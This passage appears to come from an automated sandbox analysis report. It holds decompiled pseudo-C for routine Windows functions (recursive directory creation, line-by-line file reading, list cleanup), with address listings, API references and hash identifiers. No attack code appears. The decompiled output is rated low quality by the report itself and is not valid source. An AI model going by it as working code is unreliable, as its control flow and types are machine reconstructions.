											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E011E0040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E011E0040( *_t286);
												E011E0040( *((intOrPtr*)(_t286 + 4)));
												E011E0040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E011DC5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E011DB6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

































































                                                    0x011e2dd2
                                                    0x011e2ddd
                                                    0x011e2de4
                                                    0x011e2dea
                                                    0x011e2def
                                                    0x011e2df9
                                                    0x011e2dfb
                                                    0x011e2e06
                                                    0x011e2e0c
                                                    0x011e2e0e
                                                    0x011e2e13
                                                    0x011e2e19
                                                    0x011e2e1c
                                                    0x011e2e24
                                                    0x011e2e30
                                                    0x011e2e37
                                                    0x011e2e40
                                                    0x011e2e48
                                                    0x011e2e54
                                                    0x011e2e5b
                                                    0x011e2e64
                                                    0x011e2e6c
                                                    0x011e2e78
                                                    0x011e2e7f
                                                    0x011e2e88
                                                    0x011e2eae
                                                    0x011e2f72
                                                    0x011e2f74
                                                    0x00000000
                                                    0x011e2efe
                                                    0x011e2f18
                                                    0x011e2f1d
                                                    0x011e2f1f
                                                    0x00000000
                                                    0x011e2f31
                                                    0x011e2f31
                                                    0x011e2f37
                                                    0x011e2f3b
                                                    0x011e2f3d
                                                    0x011e2f40
                                                    0x011e2f40
                                                    0x011e2f44
                                                    0x011ed999
                                                    0x011ed99c
                                                    0x011ed99c
                                                    0x011e2f4f
                                                    0x011ed9a6
                                                    0x011ed9a6
                                                    0x011e2f5b
                                                    0x011e2f64
                                                    0x011e2f70
                                                    0x011e2fc3
                                                    0x011e2fd5
                                                    0x011e2fe1
                                                    0x011e2fe6
                                                    0x011e2fec
                                                    0x011e2fec
                                                    0x011e2fee
                                                    0x00000000
                                                    0x00000000
                                                    0x011e2ffd
                                                    0x011e3002
                                                    0x011e3006
                                                    0x011e3008
                                                    0x011ed9ad
                                                    0x011ed9b4
                                                    0x011ed9b6
                                                    0x011ed9b9
                                                    0x011e301a
                                                    0x011e301a
                                                    0x011e301c
                                                    0x011ed9d1
                                                    0x011ed9d4
                                                    0x011ed9d6
                                                    0x011ed9d8
                                                    0x011ed9d8
                                                    0x011ed9e5
                                                    0x011ed9ea
                                                    0x011ed9ed
                                                    0x011ed9f0
                                                    0x011ed9f0
                                                    0x011ed9f3
                                                    0x011ed9f6
                                                    0x011ed9f6
                                                    0x011ed9ff
                                                    0x011eda04
                                                    0x011eda06
                                                    0x011eda08
                                                    0x011eda0a
                                                    0x011eda0a
                                                    0x011eda16
                                                    0x011eda18
                                                    0x011eda1d
                                                    0x011eda23
                                                    0x011eda25
                                                    0x011eda27
                                                    0x011eda27
                                                    0x011eda2d
                                                    0x011eda30
                                                    0x011eda32
                                                    0x011eda34
                                                    0x011eda34
                                                    0x011eda3c
                                                    0x011eda44
                                                    0x011eda46
                                                    0x00000000
                                                    0x011eda4c
                                                    0x011eda4c
                                                    0x011eda53
                                                    0x011eda64
                                                    0x011eda64
                                                    0x011eda69
                                                    0x011eda6e
                                                    0x011eda70
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011eda76
                                                    0x011eda57
                                                    0x011eda5c
                                                    0x011eda5e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011eda5e
                                                    0x011eda46
                                                    0x011e3022
                                                    0x011e3022
                                                    0x011e3028
                                                    0x011e302e
                                                    0x011e3034
                                                    0x011e3037
                                                    0x011e303a
                                                    0x011e303d
                                                    0x011e3043
                                                    0x011eda7b
                                                    0x011eda7b
                                                    0x011e3056
                                                    0x011e306c
                                                    0x011e306e
                                                    0x011e3073
                                                    0x011e3078
                                                    0x011e307e
                                                    0x011e3080
                                                    0x011edb67
                                                    0x011edb67
                                                    0x011edb6e
                                                    0x00000000
                                                    0x00000000
                                                    0x011edb74
                                                    0x011edb77
                                                    0x011edb88
                                                    0x011edb8b
                                                    0x00000000
                                                    0x00000000
                                                    0x011edb93
                                                    0x011edb98
                                                    0x011edb9a
                                                    0x011edb9b
                                                    0x011edba0
                                                    0x011edba5
                                                    0x011edbaf
                                                    0x00000000
                                                    0x011edbb0
                                                    0x011edb7b
                                                    0x011edb7c
                                                    0x011edb7e
                                                    0x00000000
                                                    0x011e3086
                                                    0x011e3089
                                                    0x011e308c
                                                    0x011edb61
                                                    0x00000000
                                                    0x011edb61
                                                    0x011e3092
                                                    0x011e3095
                                                    0x011eda8e
                                                    0x011eda93
                                                    0x011eda95
                                                    0x011eda97
                                                    0x011edadd
                                                    0x011edadd
                                                    0x011edae0
                                                    0x011edae2
                                                    0x011edae4
                                                    0x011edae4
                                                    0x011edaea
                                                    0x011edaf0
                                                    0x011edaf2
                                                    0x011edaf4
                                                    0x011edaf4
                                                    0x011edafc
                                                    0x011edb04
                                                    0x011edb06
                                                    0x00000000
                                                    0x011edb0c
                                                    0x011edb0c
                                                    0x011edb0f
                                                    0x011edb38
                                                    0x011edb38
                                                    0x011edb3e
                                                    0x011edb40
                                                    0x011edb42
                                                    0x011edb42
                                                    0x011edb4f
                                                    0x011edb54
                                                    0x011edb56
                                                    0x011e2f75
                                                    0x011e2f75
                                                    0x011e2f7b
                                                    0x011e2f81
                                                    0x011e2f8e
                                                    0x011e2f9b
                                                    0x011e2fa5
                                                    0x011e2fc2
                                                    0x011edb5c
                                                    0x00000000
                                                    0x011edb5c
                                                    0x011edb56
                                                    0x011edb13
                                                    0x011edb18
                                                    0x011edb1a
                                                    0x00000000
                                                    0x00000000
                                                    0x011edb22
                                                    0x011edb2b
                                                    0x011edb30
                                                    0x011edb32
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011edb32
                                                    0x011edb06
                                                    0x011eda99
                                                    0x011eda9c
                                                    0x011eda9e
                                                    0x011edaa4
                                                    0x011edaa7
                                                    0x011edaa7
                                                    0x011edaaa
                                                    0x011edaad
                                                    0x011edaad
                                                    0x011edab6
                                                    0x011edabe
                                                    0x011edac0
                                                    0x011edac2
                                                    0x011edac4
                                                    0x011edac4
                                                    0x011edad6
                                                    0x011edad6
                                                    0x011edad8
                                                    0x00000000
                                                    0x011edad8
                                                    0x011e309b
                                                    0x011e309e
                                                    0x011e30a3
                                                    0x011e30a9
                                                    0x011e30af
                                                    0x011e30b5
                                                    0x011e30b8
                                                    0x011e30f5
                                                    0x011e30f5
                                                    0x011e30fb
                                                    0x011e30fd
                                                    0x011e311a
                                                    0x011e311a
                                                    0x011e30ff
                                                    0x011e3105
                                                    0x00000000
                                                    0x011e3105
                                                    0x011e30ba
                                                    0x011e30bc
                                                    0x011e30c1
                                                    0x011e30c9
                                                    0x011e30d0
                                                    0x011e30db
                                                    0x011e30dd
                                                    0x011e30de
                                                    0x011e30e4
                                                    0x011e30e4
                                                    0x011e30e9
                                                    0x011e30ef
                                                    0x00000000
                                                    0x011e30ef
                                                    0x011e3080
                                                    0x011ed9bf
                                                    0x011ed9c0
                                                    0x011ed9c5
                                                    0x00000000
                                                    0x011ed9cb
                                                    0x011e300e
                                                    0x011e3013
                                                    0x011e3015
                                                    0x011e3015
                                                    0x011e3018
                                                    0x011e3018
                                                    0x00000000
                                                    0x011e3013
                                                    0x011e310e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e2f70
                                                    0x011e2f1f

                                                    APIs
                                                    • memset.MSVCRT ref: 011E2E1C
                                                    • memset.MSVCRT ref: 011E2E40
                                                    • memset.MSVCRT ref: 011E2E64
                                                    • memset.MSVCRT ref: 011E2E88
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F81
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F8E
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F9B
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2FA5
                                                      • Part of subcall function 011E4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 1034426908-0
                                                    • Opcode ID: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                                    • Instruction ID: 0d9978aa5c54a0c9e1598d9a801b889e23451e6f4f1ce1c119389dcb5bd3e0ea
                                                    • Opcode Fuzzy Hash: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                                    • Instruction Fuzzy Hash: 8AE19071A00A1A9BDF2DDFA5DC58AAABBF5FF54314F044099E50997240EB34EE80CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DBF30, Relevance: 15.3, APIs: 10, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E011DBF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E011DC5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E011E6FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E011DC5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0x1213cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E011E29BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E011DC5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}










































                                                    0x011dbf30
                                                    0x011dbf3b
                                                    0x011dbf42
                                                    0x011dbf48
                                                    0x011dbf4d
                                                    0x011dbf52
                                                    0x011dbf64
                                                    0x011dbf69
                                                    0x011dbf6c
                                                    0x011dbf77
                                                    0x011dbf7b
                                                    0x011dbf7d
                                                    0x011dbf80
                                                    0x011dbf87
                                                    0x011dbfa9
                                                    0x011ea3d6
                                                    0x011ea3ea
                                                    0x011ea3ea
                                                    0x011ea3eb
                                                    0x011ea3ec
                                                    0x011ea3ec
                                                    0x011dbfed
                                                    0x011dbfed
                                                    0x011dbfef
                                                    0x011dbff2
                                                    0x011dbff8
                                                    0x011dbffa
                                                    0x011dc00b
                                                    0x011dc00b
                                                    0x011dbfaf
                                                    0x011dbfb4
                                                    0x011ea3d9
                                                    0x011ea3d9
                                                    0x011dbfba
                                                    0x011dbfc6
                                                    0x011dbfce
                                                    0x011ea3e4
                                                    0x00000000
                                                    0x011dbfd4
                                                    0x011dbfd9
                                                    0x011ea3f8
                                                    0x011ea3f9
                                                    0x011ea3fa
                                                    0x011ea408
                                                    0x011ea408
                                                    0x00000000
                                                    0x011ea40d
                                                    0x011dbfe9
                                                    0x011dc00e
                                                    0x011dc019
                                                    0x011ea401
                                                    0x011ea402
                                                    0x011ea403
                                                    0x00000000
                                                    0x011ea403
                                                    0x011dc022
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc02f
                                                    0x011dc0d7
                                                    0x011dc0d7
                                                    0x011dc0d8
                                                    0x00000000
                                                    0x011dc0d8
                                                    0x011dc035
                                                    0x011dc038
                                                    0x011dc03c
                                                    0x011ea415
                                                    0x011ea415
                                                    0x011dc044
                                                    0x011dc047
                                                    0x011dc048
                                                    0x011dc052
                                                    0x011ea42b
                                                    0x011ea42f
                                                    0x011ea431
                                                    0x011ea431
                                                    0x011ea43a
                                                    0x00000000
                                                    0x011ea440
                                                    0x011ea440
                                                    0x011ea444
                                                    0x011ea446
                                                    0x011ea446
                                                    0x011ea450
                                                    0x00000000
                                                    0x011ea456
                                                    0x011ea456
                                                    0x011ea45a
                                                    0x011ea45c
                                                    0x011ea45c
                                                    0x011ea462
                                                    0x011ea465
                                                    0x011ea46b
                                                    0x011ea46d
                                                    0x011ea473
                                                    0x011ea4a2
                                                    0x011ea4a5
                                                    0x011ea4a7
                                                    0x011ea4aa
                                                    0x011ea4b0
                                                    0x011ea4b0
                                                    0x011ea4b2
                                                    0x011ea4b8
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea4be
                                                    0x011ea4c4
                                                    0x011ea4c6
                                                    0x011ea4c6
                                                    0x011ea4cf
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea4d1
                                                    0x011ea4d4
                                                    0x011ea4da
                                                    0x011ea4dc
                                                    0x011ea4df
                                                    0x011ea4e5
                                                    0x011ea4ea
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea4ec
                                                    0x00000000
                                                    0x011ea4ec
                                                    0x011ea4f0
                                                    0x011ea4f4
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea4fa
                                                    0x00000000
                                                    0x011ea4fa
                                                    0x011ea477
                                                    0x011ea479
                                                    0x011ea47b
                                                    0x011ea47c
                                                    0x011ea47c
                                                    0x011ea481
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea483
                                                    0x011ea486
                                                    0x011ea48c
                                                    0x011ea48e
                                                    0x011ea491
                                                    0x011ea493
                                                    0x011ea498
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea498
                                                    0x011ea49a
                                                    0x011ea49f
                                                    0x011ea4a0
                                                    0x00000000
                                                    0x011ea4a0
                                                    0x011ea450
                                                    0x011dc058
                                                    0x011dc058
                                                    0x011dc05c
                                                    0x011ea420
                                                    0x011ea420
                                                    0x011dc062
                                                    0x011dc07c
                                                    0x011dc07c
                                                    0x011dc07c
                                                    0x011dc082
                                                    0x011dc082
                                                    0x011dc082
                                                    0x011dc088
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc08a
                                                    0x011dc08a
                                                    0x011dc08c
                                                    0x011dc090
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc092
                                                    0x011dc095
                                                    0x011dc09b
                                                    0x011dc09e
                                                    0x011dc0a3
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc0a7
                                                    0x011dc0ab
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc0b2
                                                    0x011dc0b4
                                                    0x011dc0b7
                                                    0x011dc0bc
                                                    0x011dc0f8
                                                    0x011dc0f8
                                                    0x011dc0c8
                                                    0x011dc06d
                                                    0x011dc076
                                                    0x011dc079
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc0c8
                                                    0x011dc0b1
                                                    0x00000000
                                                    0x011dc0b1
                                                    0x011dc0df
                                                    0x011dc0e1
                                                    0x011dc100
                                                    0x011dc100
                                                    0x011dc0ed
                                                    0x00000000
                                                    0x011dc0f3
                                                    0x011ea502
                                                    0x011ea50d
                                                    0x00000000
                                                    0x011ea513
                                                    0x00000000
                                                    0x011ea513
                                                    0x011ea50d
                                                    0x011dc0ed
                                                    0x011dc07c
                                                    0x011dc052
                                                    0x011dbfeb
                                                    0x00000000
                                                    0x011dbfeb
                                                    0x011dbfce
                                                    0x011dbf54
                                                    0x011dbf5e
                                                    0x011ea3c2
                                                    0x011ea3c4
                                                    0x011ea3c6
                                                    0x011ea3ce
                                                    0x00000000
                                                    0x011ea3ce
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011DBF80
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011DBFC6
                                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DBFE1
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DBFF2
                                                      • Part of subcall function 011E29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(011E0B22,011E0B22,00007FE7), ref: 011E29E9
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC00E
                                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0C0
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC0CA
                                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0E5
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011EA502
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                    • String ID:
                                                    • API String ID: 402963468-0
                                                    • Opcode ID: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                                    • Instruction ID: 4d60beba817b71fff9d89e3844ca4d8c32e720c5dda63b5a15b768ccf64682b8
                                                    • Opcode Fuzzy Hash: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                                    • Instruction Fuzzy Hash: 74810835A006169BEB3CDF99E85CBBAB7F4EF49704F0584A9E606D7180E7708D80CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F396E, Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E011F396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0x11fd620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0x1217f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0x1217f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0x1203854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0x11d3270);
						_push(_t54);
						L011E82C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0x11fd623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0x1217f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0x1217f20);
									_t28 = _t54 + 1; // 0x11fd621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0x1217f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0x1203854;
								_t38 = E011E0638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}





















                                                    0x011f397d
                                                    0x011f397f
                                                    0x011f3985
                                                    0x011f3988
                                                    0x011f3993
                                                    0x011f399e
                                                    0x011f39a0
                                                    0x011f39a0
                                                    0x011f39a9
                                                    0x011f39ba
                                                    0x011f39c3
                                                    0x011f39cb
                                                    0x011f39d4
                                                    0x011f39d7
                                                    0x011f39db
                                                    0x00000000
                                                    0x00000000
                                                    0x011f39e7
                                                    0x011f39e9
                                                    0x011f39ec
                                                    0x011f39fa
                                                    0x011f39fc
                                                    0x011f3a01
                                                    0x011f3a02
                                                    0x011f3a0a
                                                    0x011f3a0e
                                                    0x011f3a10
                                                    0x011f3a13
                                                    0x011f3a1a
                                                    0x011f3a1f
                                                    0x011f3a21
                                                    0x011f3a24
                                                    0x011f3a24
                                                    0x011f3a0e
                                                    0x011f3a26
                                                    0x011f3a2b
                                                    0x011f3a75
                                                    0x011f3a75
                                                    0x00000000
                                                    0x011f3a2d
                                                    0x011f3a2d
                                                    0x011f3a30
                                                    0x011f3a4f
                                                    0x011f3a59
                                                    0x011f3a6a
                                                    0x00000000
                                                    0x011f3a6b
                                                    0x011f3a5e
                                                    0x011f3acb
                                                    0x011f3ad9
                                                    0x011f3ae0
                                                    0x011f3aed
                                                    0x011f3af5
                                                    0x011f3b09
                                                    0x00000000
                                                    0x011f3afd
                                                    0x011f3afd
                                                    0x011f3b00
                                                    0x00000000
                                                    0x011f3b00
                                                    0x011f3af5
                                                    0x011f3a60
                                                    0x011f3a62
                                                    0x011f3a65
                                                    0x00000000
                                                    0x011f3a65
                                                    0x011f3a32
                                                    0x011f3a37
                                                    0x011f3a3f
                                                    0x011f3a47
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3aa4
                                                    0x011f3aa4
                                                    0x011f3aa9
                                                    0x011f3aac
                                                    0x011f3ab5
                                                    0x011f3abe
                                                    0x011f3a78
                                                    0x011f3a78
                                                    0x011f3a7e
                                                    0x011f3a8b
                                                    0x011f3a93
                                                    0x011f3a99
                                                    0x00000000
                                                    0x011f3a99
                                                    0x011f3a6c
                                                    0x011f3a6c
                                                    0x011f3a6e
                                                    0x011f3a71
                                                    0x00000000
                                                    0x011f3a2d
                                                    0x011f39cd
                                                    0x011f39cd
                                                    0x00000000
                                                    0x011f39cd

                                                    APIs
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,011F3B43,?,?,?,011F977C), ref: 011F398D
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39A9
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,?,?,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F39BA
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39C3
                                                    • memcmp.MSVCRT ref: 011F3A02
                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,01217F20,?,?,?,011F3B43,?,?,?,011F977C), ref: 011F3A93
